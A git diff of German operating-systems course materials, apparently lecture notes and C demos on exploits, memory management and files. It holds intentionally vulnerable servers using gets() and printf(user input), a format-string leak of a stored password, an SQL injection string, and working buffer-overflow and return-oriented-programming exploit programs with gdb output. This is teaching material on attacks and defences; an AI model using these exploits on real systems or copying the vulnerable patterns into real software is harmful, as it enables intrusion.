diff --git a/20230611/bs-20230611.txt b/20230612/bs-20230612.txt
similarity index 100%
rename from 20230611/bs-20230611.txt
rename to 20230612/bs-20230612.txt
diff --git a/20230611/crash.c b/20230612/crash.c
similarity index 100%
rename from 20230611/crash.c
rename to 20230612/crash.c
diff --git a/20230619/bs-20220523.txt b/20230619/bs-20220523.txt
new file mode 100644
index 0000000000000000000000000000000000000000..764104b4b265302f7835ed226caf82142cd942bf
--- /dev/null
+++ b/20230619/bs-20220523.txt
@@ -0,0 +1,321 @@
+Exploits, 10.05.2019
+~~~~~~~~~~~~~~~~~~~~
+Vorab:
+
+ Dies ist keine Einladung, anderer Leute Systeme anzugreifen.
+ Derartige Handlungen sind Straftaten.
+
+ Ich erzähle Ihnen dies, damit Sie wissen,
+ wie Sie sich gegen derartige Angriffe verteidigen können.
+
+ Um es gleich vorwegzunehmen:
+ Gewöhnen Sie sich von vorneherein an,
+ sauber und ordentlich zu programmieren.
+
+Anleitungen für Exploits:
+http://www.computersecuritystudent.com/SECURITY_TOOLS/BUFFER_OVERFLOW/WINDOWS_APPS/lesson1/index.html
+http://www.thesprawl.org/research/exploit-exercises-protostar-stack/
+
+Literatur:
+Jon Erickson: Hacking: The Art of Exploitation.
+No Starch Press, 2003. ISBN: 1-59327-007-0
+
+Anleitung für den GNU-Debugger (gdb):
+http://beej.us/guide/bggdb/
+
+Formatstring-Angriff:
+
+ printf (user_string) für Exploit nutzen: %016llx
+ Server, der Passwort auf dem Stack speichert --> server-0.c
+
+ $ ./server-0
+ Your name, please: %016llx %016llx %016llx %016llx %016llx %016llx %016llx %016llx
+ Hello, 00000000004007c7 00007fdb2ced2df0 00000000004007c7 00007fdb2d0f3007
+ 20786c6c36313025 6373316870216948 00007fdb2cbd0068 0000007265746570!
+ ~~~~~~~~~~~~~~~~ ~~~~
+ Your password, please:
+
+SQL Injection: http://xkcd.com/327/
+
+ insert into students values ('Robert', 'Lenhard', '3b');
+
+ insert into students values ('Robert'); drop table students; --', 'Lenhard', '3b');
+
+Lösung des Problems: Escape-Sequenzen, Prepared Statements.
+Damit ist es möglich, auch ungewöhnliche Zeichen in Strings aufzunehmen.
+
+Vortrag zum Thema Namensvalidierung: https://media.ccc.de/v/rc3-channels-2020-77-your-name-is-invalid-
+
+Noch blöder: Java-Browser-Applet enthält Passwörter im Klartext:
+http://heise.de/-2812713
+
+Buffer Overflow für Exploit nutzen: server-[123].c, exploit-*
+
+Warum Absturz? Rücksprungadresse wird überschrieben. Blick auf den Stack.
+Funktionsaufruf: Register setzen, Funktion anspringen.
+Exploit: Rücksprungadresse gezielt überschreiben.
+Früher möglich: Programm in den Stack schreiben, dorthin springen.
+Heute: Nicht-ausführbarer Stack, Address Space Layout Randomization (ASLR)
+Return Oriented Programming erforderlich
+genauer: return-to-libc; noch genauer: return-to-plt
+Gezielt Winz-Funktionen anspringen, um Register zu setzen,
+danach Programm- und Bibliotheksfunktionen anspringen.
+
+Warum stürzt server-1.c ab, wenn der Name zu lang ist? 23.05.2022, 13:05:49
+~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
+Quelltext: server-1.c
+
+ #include <stdio.h>
+
+ int main (void)
+ {
+ char buffer[20];
+ printf ("Your name, please: ");
+ gets (buffer);
+ printf ("Hello, %s!\n", buffer);
+ return 0;
+ }
+
+Eingegebener Name: "Prof. Dr. rer. nat. Dipl.-Phys. Peter Gerwinski"
+Puffer-Länge: 20 bis hierhin ^ steht über ^
+
+Debugger, unmittelbar nach dem Absturz:
+
+ ┌──server-1.c────────────────────────────────────────────────────────────────────────────┐
+ │4 { │
+ B+ │5 char buffer[20]; │
+ │6 printf ("Your name, please: "); │
+ │7 gets (buffer); │
+ │8 printf ("Hello, %s!\n", buffer); │
+ >│9 return 0; │
+ │10 } │
+ │11 │
+ │12 │
+ │13 │
+ │14 │
+ │15 │
+ │16 │
+ ┌────────────────────────────────────────────────────────────────────────────────────────┐
+ │0x555555555166 <main+33> callq 0x555555555040 <gets@plt> │
+ │0x55555555516b <main+38> mov %rbx,%rsi │
+ │0x55555555516e <main+41> lea 0xea3(%rip),%rdi # 0x555555556018 │
+ │0x555555555175 <main+48> mov $0x0,%eax │
+ │0x55555555517a <main+53> callq 0x555555555030 <printf@plt> │
+ │0x55555555517f <main+58> mov $0x0,%eax │
+ │0x555555555184 <main+63> add $0x20,%rsp │
+ │0x555555555188 <main+67> pop %rbx │
+ >│0x555555555189 <main+68> retq │
+ │0x55555555518a nopw 0x0(%rax,%rax,1) │
+ │0x555555555190 <__libc_csu_init> push %r15 │
+ │0x555555555192 <__libc_csu_init+2> mov %rdx,%r15 │
+ │0x555555555195 <__libc_csu_init+5> push %r14 │
+ └────────────────────────────────────────────────────────────────────────────────────────┘
+ native process 27862 In: main L9 PC: 0x555555555189
+ eflags 0x202 [ IF ]
+ cs 0x33 51
+ ss 0x2b 43
+ ds 0x0 0
+ es 0x0 0
+ fs 0x0 0
+ gs 0x0 0
+ (gdb) x/2 0x7fffffffdf78
+ 0x7fffffffdf78: 0x6e697772 0x00696b73
+ (gdb) nexti
+
+ Program received signal SIGSEGV, Segmentation fault.
+ 0x0000555555555189 in main () at server-1.c:9
+ (gdb)
+
+Nach dem Durchlauf des Programms soll das Betriebssystem wieder übernehmen.
+Hierfür springt das Programm an die Speicherzelle Nr. 00696b73 6e697772 .
+
+00696b73 6e697772 in ASCII übersetzen:
+ i k s n i w r
+
+Dies sind die letzten Buchstaben mit Ende-Zeichen des eingegebenen Strings.
+
+--> Das Programm springt an eine Stelle im Speicher, die ihm nicht gehört.
+
+Diese Stelle ist aber nicht zufällig, sondern hängt von dem eingegebenen
+String ab.
+
+exploit-1.c:
+
+ #include <unistd.h>
+ #include <stdint.h>
+
+ int main (int argc, char **argv)
+ {
+ uint64_t my_program_address = 0x7fffffffdfa0;
+ for (int i = 0; i < 0x28; i++)
+ write (1, "a", 1); // zum Auffüllen, um die Rücksprung-Adresse
+ write (1, &my_program_address, 8); // überschreiben zu können
+ write (1, "I 0WN U!", 8);
+ for (int i = 0; i < 24; i++)
+ write (1, " ", 1);
+ write (1, "\x48\x89\xe7", 3); // mov %rsp,%rdi hierhin erfolgt der
+ write (1, "\xb8\x00\x00\x00\x00", 5); // mov $0x0,%eax "Rück-"Sprung
+ write (1, "\xe8\x26\xfe\xff\xff", 5); // callq 0x4003e0 <printf@plt>
+ write (1, "\xeb\xfe", 2); // while (1);
+ write (1, "\n", 1);
+ return 0;
+ }
+
+Ich übergebe als "Namen" einen String, der ausführbare Programm-Fragmente
+enthält (hier: printf "I 0WN U!") und überschreibe die Rücksprungadresse
+derart, daß dieses Programm-Fragment anschließend ausgeführt werden soll.
+
+ ┌──server-1.c────────────────────────────────────────────────────────────────────────────┐
+ │ │
+ │ │
+ │ │
+ │ │
+ │ │
+ │ │
+ │ [ No Source Available ] │
+ │ │
+ │ │
+ │ │
+ │ │
+ │ │
+ │ │
+ ┌────────────────────────────────────────────────────────────────────────────────────────┐
+ >│0x7fffffffdfa0 mov %rsp,%rdi │
+ │0x7fffffffdfa3 mov $0x0,%eax │
+ │0x7fffffffdfa8 callq 0x7fffffffddd3 │
+ │0x7fffffffdfad jmp 0x7fffffffdfad │
+ │0x7fffffffdfaf add %ah,0x50(%rax) │
+ │0x7fffffffdfb2 push %rbp │
+ │0x7fffffffdfb3 push %rbp │
+ │0x7fffffffdfb4 push %rbp │
+ │0x7fffffffdfb5 push %rbp │
+ │0x7fffffffdfb6 add %al,(%rax) │
+ │0x7fffffffdfb8 push %rax │
+ │0x7fffffffdfb9 loopne 0x7fffffffdfba │
+ │0x7fffffffdfbb (bad) │
+ └────────────────────────────────────────────────────────────────────────────────────────┘
+ native process 30875 In: L?? PC: 0x7fffffffdfa0
+ fs 0x0 0
+ gs 0x0 0
+ (gdb) x/2 0x7fffffffdf78
+ 0x7fffffffdf78: 0xffffdfa0 0x00007fff
+ (gdb) x/2 0x00007fffffffdfa0
+ 0x7fffffffdfa0: 0xb8e78948 0x00000000
+ (gdb) disassemble 0x00007fffffffdfa0
+ No function contains specified address.
+ (gdb) x/16b 0x00007fffffffdfa0
+ 0x7fffffffdfa0: 0x48 0x89 0xe7 0xb8 0x00 0x00 0x00 0x00
+ 0x7fffffffdfa8: 0xe8 0x26 0xfe 0xff 0xff 0xeb 0xfe 0x00
+ (gdb) nexti
+ 0x00007fffffffdfa0 in ?? ()
+ (gdb) nexti
+
+ Program received signal SIGSEGV, Segmentation fault.
+ 0x00007fffffffdfa0 in ?? ()
+ (gdb)
+
+Ergebnis: Der von uns eingeschleuste Code wird tatsächlich angesprungen,
+dann allerdings nicht ausgeführt. Stattdessen: Speicherzugriffsfehler.
+
+Erklärung: Der Code befindet sich auf dem Stack.
+Der Stack ist aber von der Hardware als nicht-ausführbar markiert.
+Beim Versuch, diesen Code auszuführen, löst der Prozessor eine
+Exception aus.
+
+(Früher funktionierten derartige Exploits.)
+
+Auch diese Schutzfunktion kann man überwinden:
+Return-Oriented Programming, 23.05.2022, 13:32:33
+~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
+server-2.c:
+
+ #include <stdio.h>
+ #include <stdlib.h>
+
+ void stuff (void)
+ {
+ asm ("mov $0, %eax");
+ asm ("add $0x28, %rsp");
+ asm ("ret");
+ asm ("nop");
+ asm ("nop");
+ asm ("nop");
+ asm ("mov %rsp, %rdi");
+ asm ("ret");
+ asm ("nop");
+ asm ("nop");
+ asm ("nop");
+ asm ("add $0x20, %rdi");
+ asm ("ret");
+ asm ("nop");
+ asm ("nop");
+ asm ("nop");
+ system ("clear");
+ exit (0);
+ }
+
+ int main (void)
+ {
+ char buffer[20];
+ printf ("Your name, please: ");
+ gets (buffer);
+ printf ("Hello, %s!\n", buffer);
+ return 0;
+ }
+
+Das Angreifer-Programm sorgt dafür, der Befehl "mov %rsp, %rdi"
+ausgeführt wird. Dies geschieht, indem es die Rücksprungadresse
+darauf verweisen läßt.
+
+ #include <stdlib.h>
+ #include <stdint.h>
+ #include <unistd.h>
+
+ #define OVERFLOW 40
+
+ int main (int argc, char **argv)
+ {
+ uint64_t mov_rsp_rdi = 0x555555555176;
+ uint64_t add_offset_to_rdi = 0x55555555517d;
+ uint64_t dummy = 0;
+ uint64_t printf_address = 0x555555555040;
+ uint64_t exit_address = 0x555555555060;
+ uint8_t overflow[OVERFLOW] = "loser";
+ uint8_t payload[] = "I 0WN U!!1! "
+ " ";
+ write (1, overflow, sizeof (overflow));
+ write (1, &mov_rsp_rdi, 8);
+ write (1, &add_offset_to_rdi, 8);
+ write (1, &printf_address, 8);
+ write (1, &exit_address, 8);
+ write (1, &dummy, 8);
+ write (1, payload, sizeof (payload));
+ write (1, "\n", 1);
+ return 0;
+ }
+
+Mit dem nächsten Rücksprung führt es dann "add $0x20, %rdi" aus.
+Danach zeigt das %rdi-Register auf den String "I 0WN U!!1!".
+
+Mit dem nächsten Rücksprung rufen wir die Funktion printf()
+für diesen String auf. (Hier ist wichtig, daß sich im %eax-Register
+bereits eine Null befindet. Diese kommt noch von dem "return 0;".)
+
+Nach erfolgtem printf() ruft der nächste Rücksprung die Funktion
+exit() auf, um das Programm kontrolliert zu beenden. Dabei wird
+auch die Datei stdin geschlossen und der String "I 0WN U!!1"
+ausgegeben.
+
+Exploits: aktuelle Sicherheitslücke, 28.12.2016, 13:46:05
+~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
+Lücke in PHPMailer erlaubt die Ausführung fremden Codes
+https://heise.de/-3582072
+
+Exploits, 29.06.2020, 15:38:10
+~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
+Früher möglich: Programm in den Stack schreiben, dorthin springen.
+Heute: Nicht-ausführbarer Stack, Address Space Layout Randomization (ASLR)
+Return Oriented Programming erforderlich
+genauer: return-to-libc; noch genauer: return-to-plt
+Gezielt Winz-Funktionen anspringen, um Register zu setzen,
+danach Programm- und Bibliotheksfunktionen anspringen.
diff --git a/20230619/bs-20230619.txt b/20230619/bs-20230619.txt
new file mode 100644
index 0000000000000000000000000000000000000000..51f7c45a017e5a73f5e1d30dff55b88e466b2627
--- /dev/null
+++ b/20230619/bs-20230619.txt
@@ -0,0 +1,83 @@
+Speicher-Management, 12.06.2023, 17:36:11
+~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
+Ein Programm, das versucht, auf eine nicht freigegebene Speicherzelle
+zuzugreifen, wird vom Betriebssystem unterbrochen.
+Hierfür notwendig: Hardware-Unterstützung.
+
+Speicher auf dem 8086 (16-Bit-Prozessor):
+
+ 322e:0100
+ ^ ^
+ | `---- Offset-Adresse
+ |
+ `-------- Segment-Adresse
+
+physikalische Adresse = 16 · Segment-Adresse + Offset-Adresse
+
+ 322d:0110 ist dieselbe Adresse wie 322e:0100
+
+Sinn der Sache: Relozierbarkeit von Programmen.
+Betriebssystem vergibt Segment-Adresse.
+Programm arbeitet mit Offset-Adresse.
+--> Programm in 16-Byte-Schritten relozierbar.
+
+Insgesamt: 20 Bit = 1 MiB max. Speichergröße
+Offset: 16 Bit = 64 kiB durch Programm nutzbar
+
+Reicht nicht mehr --> 4 Segmente: Code, Daten, Stack, Extra
+--> Insgesamt: 4 · 64 kiB = 256 kiB
+
+Speicher auf dem 80286 (16-Bit-Prozessor mit Speicherschutzmechanismen):
+
+ 0020:0100
+ ^ ^
+ | `---- Offset-Adresse (16 Bit)
+ |
+ `--------- Selektor
+
+Selektor = Index für ein Array innerhalb des Prozessors,
+das die physikalischen Speicheradressen enthält.
+Diese können dann auch über 1 MiB hinausgehen.
+
+--> Man kann Programme gegeneinander abschotten. Jedes bekommt bis zu 256 kiB.
+
+Speicher auf dem 80386 (32-Bit-Prozessor mit Speicherschutzmechanismen):
+
+ 0020:00000100
+ ^ ^
+ | `---- Offset-Adresse (32 Bit)
+ |
+ `--------- Selektor
+
+Selektor = Index für ein Array innerhalb des Prozessors,
+das die physikalischen Speicheradressen enthält.
+
+--> Man kann Programme gegeneinander abschotten. Jedes bekommt bis zu 4 · 4 GiB.
+ Betriebssysteme, die das machen: OS/2, Linux, Windows NT, Windows XP
+
+Man kann außerdem in der Tabelle vermerken, ob Speicher tatsächlich
+zugeordnet ist. --> Auslagerungsdatei/-partition auf Segment-Ebene
+
+Speicher auf späteren Prozessoren: MMU (Memory Management Unit)
+
+ 0020:00000100
+ ^ ^
+ | `---- Offset-Adresse (32 oder 64 Bit)
+ |
+ `--------- Selektor
+
+Selektor = Index für ein Array innerhalb des Prozessors,
+das die virtuellen Speicheradressen enthält.
+
+Die MMU bildet diese dann auf eine physikalische Speicheradresse ab.
+Granularität: Speicher-"Seite" (4 kiB)
+--> In Zeigern stehen nur noch virtuelle Speicheradressen.
+ Diese werden dann über ein Array innerhalb des Prozessors
+ auf physikalische Speicheradressen abgebildet.
+
+Man kann außerdem in der MMU vermerken, ob Speicher tatsächlich
+zugeordnet ist. --> Auslagerungsdatei/-partition auf Seiten-Ebene
+
+Außerdem möglich: Shared Memory, Datei-Mapping
+
+@@@ --> nächste Woche
diff --git a/20230619/crash.c b/20230619/crash.c
new file mode 100644
index 0000000000000000000000000000000000000000..62d224512d44d55d34a532eb9fcc9ea14e443368
--- /dev/null
+++ b/20230619/crash.c
@@ -0,0 +1 @@
+main(){puts(0);}
diff --git a/20230619/exploit-1-misslungen.txt b/20230619/exploit-1-misslungen.txt
new file mode 100644
index 0000000000000000000000000000000000000000..4483afdc3699845a26ea75de4f4f6d960677319f
--- /dev/null
+++ b/20230619/exploit-1-misslungen.txt
@@ -0,0 +1,43 @@
+ ┌──server-1.c────────────────────────────────────────────────────────────────────────────┐
+ │ │
+ │ │
+ │ │
+ │ │
+ │ │
+ │ │
+ │ [ No Source Available ] │
+ │ │
+ │ │
+ │ │
+ │ │
+ │ │
+ ┌────────────────────────────────────────────────────────────────────────────────────────┐
+ >│0x7fffffffdfb0 mov %rsp,%rdi │
+ │0x7fffffffdfb3 mov $0x0,%eax │
+ │0x7fffffffdfb8 callq 0x7fffffffdde3 │
+ │0x7fffffffdfbd jmp 0x7fffffffdfbd │
+ │0x7fffffffdfbf add %ah,0x50(%rax) │
+ │0x7fffffffdfc2 push %rbp │
+ │0x7fffffffdfc3 push %rbp │
+ │0x7fffffffdfc4 push %rbp │
+ │0x7fffffffdfc5 push %rbp │
+ │0x7fffffffdfc6 add %al,(%rax) │
+ │0x7fffffffdfc8 (bad) │
+ │0x7fffffffdfc9 loopne 0x7fffffffdfca │
+ │0x7fffffffdfcb (bad) │
+ └────────────────────────────────────────────────────────────────────────────────────────┘
+native process 19324 In: L?? PC: 0x7fffffffdfb0
+0x7fffffffdf90: 0x49 0x20 0x30 0x57 0x4e 0x20 0x55 0x21
+0x7fffffffdf98: 0x20 0x20 0x20 0x20 0x20 0x20 0x20 0x20
+0x7fffffffdfa0: 0x20 0x20 0x20 0x20 0x20 0x20 0x20 0x20
+(gdb) x /32bx 0x7fffffffdfb0
+0x7fffffffdfb0: 0x48 0x89 0xe7 0xb8 0x00 0x00 0x00 0x00
+0x7fffffffdfb8: 0xe8 0x26 0xfe 0xff 0xff 0xeb 0xfe 0x00
+0x7fffffffdfc0: 0x60 0x50 0x55 0x55 0x55 0x55 0x00 0x00
+0x7fffffffdfc8: 0x60 0xe0 0xff 0xff 0xff 0x7f 0x00 0x00
+(gdb) stepi
+0x00007fffffffdfb0 in ?? ()
+
+Program received signal SIGSEGV, Segmentation fault.
+0x00007fffffffdfb0 in ?? ()
+(gdb)
diff --git a/20230619/exploit-1.c b/20230619/exploit-1.c
new file mode 100644
index 0000000000000000000000000000000000000000..e6f04af30a4fc68959714a2cc24239418c1b53c3
--- /dev/null
+++ b/20230619/exploit-1.c
@@ -0,0 +1,19 @@
+#include <unistd.h>
+#include <stdint.h>
+
+int main (int argc, char **argv)
+{
+ uint64_t my_program_address = 0x7fffffffdfb0;
+ for (int i = 0; i < 0x28; i++)
+ write (1, "a", 1); // zum Auffüllen, um die Rücksprung-Adresse
+ write (1, &my_program_address, 8); // überschreiben zu können
+ write (1, "I 0WN U!", 8);
+ for (int i = 0; i < 24; i++)
+ write (1, " ", 1);
+ write (1, "\x48\x89\xe7", 3); // mov %rsp,%rdi hierhin erfolgt der
+ write (1, "\xb8\x00\x00\x00\x00", 5); // mov $0x0,%eax "Rück-"Sprung
+ write (1, "\xe8\x26\xfe\xff\xff", 5); // callq 0x4003e0 <printf@plt>
+ write (1, "\xeb\xfe", 2); // while (1);
+ write (1, "\n", 1);
+ return 0;
+}
diff --git a/20230619/exploit-1.txt b/20230619/exploit-1.txt
new file mode 100644
index 0000000000000000000000000000000000000000..639147e81e142cf90c33523dfe74d33708d3aba1
Binary files /dev/null and b/20230619/exploit-1.txt differ
diff --git a/20230619/exploit-2.c b/20230619/exploit-2.c
new file mode 100644
index 0000000000000000000000000000000000000000..3010e84b21f554807ba1b73d8f35a57b3587deff
--- /dev/null
+++ b/20230619/exploit-2.c
@@ -0,0 +1,26 @@
+#include <stdlib.h>
+#include <stdint.h>
+#include <unistd.h>
+
+#define OVERFLOW 40
+
+int main (int argc, char **argv)
+{
+ uint64_t mov_rsp_rdi = 0x555555555176;
+ uint64_t add_offset_to_rdi = 0x55555555517d;
+ uint64_t dummy = 0;
+ uint64_t printf_address = 0x555555555040;
+ uint64_t exit_address = 0x555555555060;
+ uint8_t overflow[OVERFLOW] = "loser";
+ uint8_t payload[] = "I 0WN U!!1! "
+ " ";
+ write (1, overflow, sizeof (overflow));
+ write (1, &mov_rsp_rdi, 8);
+ write (1, &add_offset_to_rdi, 8);
+ write (1, &printf_address, 8);
+ write (1, &exit_address, 8);
+ write (1, &dummy, 8);
+ write (1, payload, sizeof (payload));
+ write (1, "\n", 1);
+ return 0;
+}
diff --git a/20230619/exploit-2.txt b/20230619/exploit-2.txt
new file mode 100644
index 0000000000000000000000000000000000000000..ea10070d643247bec138f8732d1711dd19cb34dd
Binary files /dev/null and b/20230619/exploit-2.txt differ
diff --git a/20230619/exploit-3.c b/20230619/exploit-3.c
new file mode 100644
index 0000000000000000000000000000000000000000..ae1903af3ddf12c812a784223c700d22904600c1
--- /dev/null
+++ b/20230619/exploit-3.c
@@ -0,0 +1,25 @@
+#include <stdlib.h>
+#include <stdint.h>
+#include <unistd.h>
+
+#define OVERFLOW 40
+
+int main (int argc, char **argv)
+{
+ uint64_t mov_rsp_rdi = 0x555555555176;
+ uint64_t add_offset_to_rdi = 0x55555555517d;
+ uint64_t dummy = 0;
+ uint64_t system_address = 0x555555555030; // 0x7ffff7e109c0;
+ uint64_t exit_address = 0x555555555060; // 0x7ffff7e04ea0;
+ uint8_t overflow[OVERFLOW] = "loser";
+ uint8_t payload[] = "gimp ../common/os-layers.xcf.gz";
+ write (1, overflow, sizeof (overflow));
+ write (1, &mov_rsp_rdi, 8);
+ write (1, &add_offset_to_rdi, 8);
+ write (1, &system_address, 8);
+ write (1, &exit_address, 8);
+ write (1, &dummy, 8);
+ write (1, payload, sizeof (payload));
+ write (1, "\n", 1);
+ return 0;
+}
diff --git a/20230619/exploit-3.txt b/20230619/exploit-3.txt
new file mode 100644
index 0000000000000000000000000000000000000000..93827d33fe1916d2e75430c55108af67c634aecb
Binary files /dev/null and b/20230619/exploit-3.txt differ
diff --git a/20230619/files-01.c b/20230619/files-01.c
new file mode 100644
index 0000000000000000000000000000000000000000..3449d19af7ea74f97c94981dafe3cb8405be1e02
--- /dev/null
+++ b/20230619/files-01.c
@@ -0,0 +1,13 @@
+#include <unistd.h>
+#include <fcntl.h>
+
+int main (void)
+{
+ int file = open ("files.txt", O_CREAT | O_RDWR, 0666);
+ for (int i = 0; i < 1000; i++)
+ {
+ write (file, "Hello, world!\n", 14);
+ sleep (1);
+ }
+ close (file);
+}
diff --git a/20230619/files-02.c b/20230619/files-02.c
new file mode 100644
index 0000000000000000000000000000000000000000..516a53f45327f8fd4e40b88a11f71d359a1aef97
--- /dev/null
+++ b/20230619/files-02.c
@@ -0,0 +1,10 @@
+#include <unistd.h>
+#include <fcntl.h>
+
+int main (void)
+{
+ int file = open ("files.txt", O_CREAT | O_RDWR, 0666);
+ write (file, "Hello, world!\n", 14);
+ sleep (10);
+ close (file);
+}
diff --git a/20230619/files-03.c b/20230619/files-03.c
new file mode 100644
index 0000000000000000000000000000000000000000..4b0186d499ed4c38e13a9eab7a3546f043fb1757
--- /dev/null
+++ b/20230619/files-03.c
@@ -0,0 +1,13 @@
+#include <unistd.h>
+#include <fcntl.h>
+
+int main (void)
+{
+ int file = open ("files.txt", O_RDWR, 0666);
+ for (int i = 0; i < 1000; i++)
+ {
+ write (file, "Hello, world!\n", 14);
+ sleep (1);
+ }
+ close (file);
+}
diff --git a/20230619/hello-01.c b/20230619/hello-01.c
new file mode 100644
index 0000000000000000000000000000000000000000..b19d80e9bd0bd7c5ed8f54b20c6a50d9166f03ac
--- /dev/null
+++ b/20230619/hello-01.c
@@ -0,0 +1,7 @@
+#include <stdio.h>
+
+int main (void)
+{
+ printf ("Hello, world!\n");
+ return 0;
+}
diff --git a/20230619/hello-02.c b/20230619/hello-02.c
new file mode 100644
index 0000000000000000000000000000000000000000..d3fbcd3da43279bbdf37fac1e593b8281b85cafb
--- /dev/null
+++ b/20230619/hello-02.c
@@ -0,0 +1,7 @@
+#include <stdio.h>
+
+int main (void)
+{
+ printf ("Hello, world! ");
+ return 0;
+}
diff --git a/20230619/hello-03.c b/20230619/hello-03.c
new file mode 100644
index 0000000000000000000000000000000000000000..0e56d5a33a3ac5f71ac2f06073beb86162ca8947
--- /dev/null
+++ b/20230619/hello-03.c
@@ -0,0 +1,7 @@
+#include <unistd.h>
+
+int main (void)
+{
+ write (1, "Hello, world!\n", 14);
+ return 0;
+}
diff --git a/20230619/server-0.c b/20230619/server-0.c
new file mode 100644
index 0000000000000000000000000000000000000000..96f8b4df4c5a467aa5d2ec424434a6a33a6f6127
--- /dev/null
+++ b/20230619/server-0.c
@@ -0,0 +1,24 @@
+#include <stdio.h>
+#include <string.h>
+#include <unistd.h>
+
+int main (void)
+{
+ char name_buffer[100];
+ char *pass_buffer;
+ char username[] = "peter";
+ char password[] = "Hi!ph1sch";
+
+ printf ("Your name, please: ");
+ gets (name_buffer);
+ printf ("Hello, ");
+ printf (name_buffer);
+ printf ("!\n");
+
+ pass_buffer = getpass ("Your password, please: ");
+ if (strcmp (name_buffer, username) == 0 && strcmp (pass_buffer, password) == 0)
+ printf ("You have access.\n");
+ else
+ printf ("Login incorrect.\n");
+ return 0;
+}
diff --git a/20230619/server-0.txt b/20230619/server-0.txt
new file mode 100644
index 0000000000000000000000000000000000000000..1b18335a3b95152650dad9f3cd6625fbac6e4bdd
--- /dev/null
+++ b/20230619/server-0.txt
@@ -0,0 +1,53 @@
+#include <stdio.h>
+
+int main (void)
+{
+ printf ("Der Name lautet: Pet%dr\n");
+ return 0;
+}
+cassini/home/peter/bo/2022ss/bs/20220523> gcc -Wall -O printf-05.c -o printf-05
+printf-05.c: In function ‘main’:
+printf-05.c:5:33: warning: format ‘%d’ expects a matching ‘int’ argument [-Wformat=]
+ printf ("Der Name lautet: Pet%dr\n");
+ ~^
+cassini/home/peter/bo/2022ss/bs/20220523> ./printf-05
+Der Name lautet: Pet668572360r
+cassini/home/peter/bo/2022ss/bs/20220523> cat server-0.c
+#include <stdio.h>
+#include <string.h>
+#include <unistd.h>
+
+int main (void)
+{
+ char name_buffer[100];
+ char *pass_buffer;
+ char username[] = "peter";
+ char password[] = "Hi!ph1sch";
+
+ printf ("Your name, please: ");
+ gets (name_buffer);
+ printf ("Hello, ");
+ printf (name_buffer);
+ printf ("!\n");
+
+ pass_buffer = getpass ("Your password, please: ");
+ if (strcmp (name_buffer, username) == 0 && strcmp (pass_buffer, password) == 0)
+ printf ("You have access.\n");
+ else
+ printf ("Login incorrect.\n");
+ return 0;
+}
+cassini/home/peter/bo/2022ss/bs/20220523> ./server-0
+Your name, please: Pet%dr
+Hello, Pet1819043144r!
+Your password, please:
+Login incorrect.
+cassini/home/peter/bo/2022ss/bs/20220523> ./server-0
+Your name, please: %016llx %016llx %016llx %016llx %016llx %016llx %016llx %016llx
+Hello, 000000006c6c6548 00007fdc518588c0 0000000000000000 00007fdc5185d500
+ 0000000000000000 6373316870216948 0072657465700068 20786c6c36313025!
+Your password, please:
+
+000000006c6c6548 = "Hell"
+6373316870216948 = "Hi!ph1sc"
+0072657465700068 = "h"
diff --git a/20230619/server-0a.c b/20230619/server-0a.c
new file mode 100644
index 0000000000000000000000000000000000000000..6c6f22f5d9ae1c0b03dcd5d6d0ba8805d9dc3a64
--- /dev/null
+++ b/20230619/server-0a.c
@@ -0,0 +1,22 @@
+#include <stdio.h>
+#include <string.h>
+#include <unistd.h>
+
+int main (void)
+{
+ char name_buffer[100];
+ char *pass_buffer;
+ char username[] = "peter";
+ char password[] = "Hi!ph1sch";
+
+ printf ("Your name, please: ");
+ gets (name_buffer);
+ printf ("Hello, %s!\n", name_buffer);
+
+ pass_buffer = getpass ("Your password, please: ");
+ if (strcmp (name_buffer, username) == 0 && strcmp (pass_buffer, password) == 0)
+ printf ("You have access.\n");
+ else
+ printf ("Login incorrect.\n");
+ return 0;
+}
diff --git a/20230619/server-1.c b/20230619/server-1.c
new file mode 100644
index 0000000000000000000000000000000000000000..68f9eb57f5e277413a0206ed9af175033e9cda9d
--- /dev/null
+++ b/20230619/server-1.c
@@ -0,0 +1,10 @@
+#include <stdio.h>
+
+int main (void)
+{
+ char buffer[20];
+ printf ("Your name, please: ");
+ gets (buffer);
+ printf ("Hello, %s!\n", buffer);
+ return 0;
+}
diff --git a/20230619/server-2.c b/20230619/server-2.c
new file mode 100644
index 0000000000000000000000000000000000000000..4aac725ae5c30412f0952a770d1c9d9f6c1f6895
--- /dev/null
+++ b/20230619/server-2.c
@@ -0,0 +1,33 @@
+#include <stdio.h>
+#include <stdlib.h>
+
+void stuff (void)
+{
+ asm ("mov $0, %eax");
+ asm ("add $0x28, %rsp");
+ asm ("ret");
+ asm ("nop");
+ asm ("nop");
+ asm ("nop");
+ asm ("mov %rsp, %rdi");
+ asm ("ret");
+ asm ("nop");
+ asm ("nop");
+ asm ("nop");
+ asm ("add $0x20, %rdi");
+ asm ("ret");
+ asm ("nop");
+ asm ("nop");
+ asm ("nop");
+ system ("clear");
+ exit (0);
+}
+
+int main (void)
+{
+ char buffer[20];
+ printf ("Your name, please: ");
+ gets (buffer);
+ printf ("Hello, %s!\n", buffer);
+ return 0;
+}
diff --git a/20230619/server-3.c b/20230619/server-3.c
new file mode 100644
index 0000000000000000000000000000000000000000..11c3a7ff2bf4e1f27accebd7d9caddf6d90dfb66
--- /dev/null
+++ b/20230619/server-3.c
@@ -0,0 +1,33 @@
+#include <stdio.h>
+#include <stdlib.h>
+
+void stuff (void)
+{
+ asm ("mov $0, %eax");
+ asm ("add $0x28, %rsp");
+ asm ("ret");
+ asm ("nop");
+ asm ("nop");
+ asm ("nop");
+ asm ("mov %rsp, %rdi");
+ asm ("ret");
+ asm ("nop");
+ asm ("nop");
+ asm ("nop");
+ asm ("add $0x20, %rdi");
+ asm ("ret");
+ asm ("nop");
+ asm ("nop");
+ asm ("nop");
+ system ("clear");
+ exit (0);
+}
+
+int main (void)
+{
+ char buffer[20];
+ printf ("Your name, please: ");
+ fgets (buffer, 20, stdin);
+ printf ("Hello, %s!\n", buffer);
+ return 0;
+}
diff --git a/20230619/shm-1a.c b/20230619/shm-1a.c
new file mode 100644
index 0000000000000000000000000000000000000000..c404db3bdb22a6b0a0a1e30b47b4b2de0a048f12
--- /dev/null
